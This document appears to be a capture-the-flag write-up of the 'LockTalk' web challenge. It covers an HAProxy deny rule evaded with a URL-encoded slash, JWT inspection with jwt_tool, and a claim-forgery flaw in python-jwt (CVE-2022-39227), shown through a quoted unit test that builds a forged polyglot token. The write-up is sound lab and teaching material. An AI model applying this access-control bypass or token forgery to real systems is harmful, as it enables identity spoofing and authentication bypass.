In "The Ransomware Dystopia," LockTalk emerges as a beacon of resistance against the rampant chaos inflicted by ransomware groups. In a world plunged into turmoil by malicious cyber threats, LockTalk stands as a formidable force, dedicated to protecting society from the insidious grip of ransomware. Chosen participants, tasked with representing their districts, navigate a perilous landscape fraught with ethical quandaries and treacherous challenges orchestrated by LockTalk. Their journey intertwines with the organization's mission to neutralize ransomware threats and restore order to a fractured world. As players confront internal struggles and external adversaries, their decisions shape the fate of not only themselves but also their fellow citizens, driving them to unravel the mysteries surrounding LockTalk and choose between succumbing to despair or standing resilient against the encroaching darkness.
We can review source code but first let's check the site functionality. The homepage has 3 available API endpoints:
GET /api/v1/get_ticket - Generates a ticket (JWT token)
GET /api/v1/chat/{chatId} - Finds chat history by ID
GET /api/v1/flag - Retrieves the flag
Unfortunately, we can't execute the last two queries since they require a JWT. However, we can try to generate a JWT with get_ticket.
Forbidden: Request forbidden by administrative rules.
OK, I guess not then 🙃 I don't see any other interesting functionality and burp scanner didn't find anything notable. Time to review the source code!
The following line in haproxy.cfg explains the previous error. It's checking if our URL-decoded (url_dec), case-insensitive (-i) path begins (path_beg) with /api/v1/get_ticket.
I quickly realised this was a dead end since none of the endpoints support POST requests and the deny rule doesn't appear to exclude internal traffic.
I decided to try 403 Bypasser and found a few different techniques to bypass, e.g. this one with a URL-encoded /.
Now we have a valid JWT and can read chat history but not retrieve the flag.
Checking jwt_tool, we find information about the token.
jwt_tool eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAwODA5MTcsImlhdCI6MTcxMDA3NzMxNywianRpIjoiUkdjaHZFZVBNZFJYRlpQR2hHT0pOUSIsIm5iZiI6MTcxMDA3NzMxNywicm9sZSI6Imd1ZXN0IiwidXNlciI6Imd1ZXN0X3VzZXIifQ.Vzxw0lMT-Gbr6TaxLw5_rge7mYRpBvl2D1D1h8pUymROJML9BeYnbp0j1G2qUgWk2SMJTB43dt5nNb7z3mjK_Oe7RwLHTHhCxxyAjO3z4U2XhpmRhXm6YYALZELFY00Kv0yJvqlshFdnOgK0VnU3ziiUJvJRpRL4WHpMVspAHPyf6YHcgDiWyJua5-3nGog1bYcQy9CuxYKTfeXhVRBzsyyOoJII0EggDJIzfadf1OXh2MzGrkaXCghe8Whb9VGsrBRDGsELc2p0UOBAljJuKaPS2RtheX2-Kb8RAQ_ZtD_XQm0RD2HhFOyRRhSyRXmvsj2m3vT34z5Ix8nG4SZb8Q
Tokenheadervalues:[+] alg = "PS256"[+] typ = "JWT"Tokenpayloadvalues:[+] exp = 1710080917 ==> TIMESTAMP = 2024-03-10 14:28:37 (UTC)[+] iat = 1710077317 ==> TIMESTAMP = 2024-03-10 13:28:37 (UTC)[+] jti = "RGchvEePMdRXFZPGhGOJNQ"[+] nbf = 1710077317 ==> TIMESTAMP = 2024-03-10 13:28:37 (UTC)[+] role = "guest"[+] user = "guest_user"Seentimestamps:[*] exp was seen[*] iat is earlier than exp by: 0 days, 1 hours, 0 mins[*] nbf is earlier than exp by: 0 days, 1 hours, 0 mins----------------------JWTcommontimestamps:iat=IssuedAtexp=Expiresnbf=NotBefore----------------------
We're unable to crack secret due to an error: Algorithm is not HMAC-SHA - cannot test against passwords, try the Verify function.
If we simply change role to administrator and sign with the none algorithm: algorithm not allowed: none.
Similarly, trying to sign with a null key using the JWT editor burp extension returns algorithm not allowed: HS256, but there's no PS256 option for us to experiment with.
It does not work: Verification failed for all signatures[\"Failed: [InvalidJWSSignature('Verification failed')]\"]
OK, enough black box testing. We can check the source code and understand why this would fail; they generate their own key in Of course ours is not valid 😁
I decided to look for any recent vulnerabilities in the python-jwt package.
Note: Versions 3.3.4 and later fix a vulnerability (CVE-2022-39227) in JSON Web Token verification which lets an attacker with a valid token re-use its signature with modified claims. CVE to follow. Please upgrade!
You don't say? That's exactly what we'd like to do! 😼
An attacker who obtains a JWT can arbitrarily forge its contents without knowing the secret key. Depending on the application, this may for example enable the attacker to spoof other user's identities, hijack their sessions, or bypass authentication.
It doesn't explain how to forge a JWT but there are some accompanying unit tests
""" Test claim forgery vulnerability fix """from datetime import timedeltafrom json import loads, dumpsfrom test.common import generated_keysfrom test import python_jwt as jwtfrom pyvows import Vows, expectfrom jwcrypto.common import base64url_decode, base64url_encode@Vows.batchclassForgedClaims(Vows.Context):""" Check we get an error when payload is forged using mix of compact and JSON formats """deftopic(self):""" Generate token """ payload ={'sub':'alice'}return jwt.generate_jwt(payload, generated_keys['PS256'], 'PS256', timedelta(minutes=60))classPolyglotToken(Vows.Context):""" Make a forged token """deftopic(self,topic):""" Use mix of JSON and compact format to insert forged claims including long expiration """ [header, payload, signature] = topic.split('.') parsed_payload =loads(base64url_decode(payload)) parsed_payload['sub']='bob' parsed_payload['exp']=2000000000 fake_payload =base64url_encode((dumps(parsed_payload, separators=(',', ':'))))return'{" '+ header +'.'+ fake_payload +'.":"","protected":"'+ header +'", "payload":"'+ payload +'","signature":"'+ signature +'"}'classVerify(Vows.Context):""" Check the forged token fails to verify """@Vows.capture_errordeftopic(self,topic):""" Verify the forged token """return jwt.verify_jwt(topic, generated_keys['PS256'], ['PS256'])deftoken_should_not_verify(self,r):""" Check the token doesn't verify due to mixed format being detected """expect(r).to_be_an_error()expect(str(r)).to_equal('invalid JWT format')
I started to build a custom script but had lots of python package issues and ended up finding a pre-existing PoC instead 😌